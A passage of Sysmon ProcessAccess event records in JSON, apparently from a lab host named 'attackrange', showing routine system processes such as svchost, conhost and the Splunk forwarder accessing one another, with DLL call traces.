C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3456,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3457,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3458,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3459,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3460,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3461,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3462,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.548\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-00101F770500}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.548","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-00101F770500}","TargetProcessId":"2968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3463,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.782\r\nSourceProcessGUID: {41C8662E-1FF5-5F25-0000-00101F770500}\r\nSourceProcessId: 2968\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.782","SourceProcessGUID":"{41C8662E-1FF5-5F25-0000-00101F770500}","SourceProcessId":"2968","SourceThreadId":"2988","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program 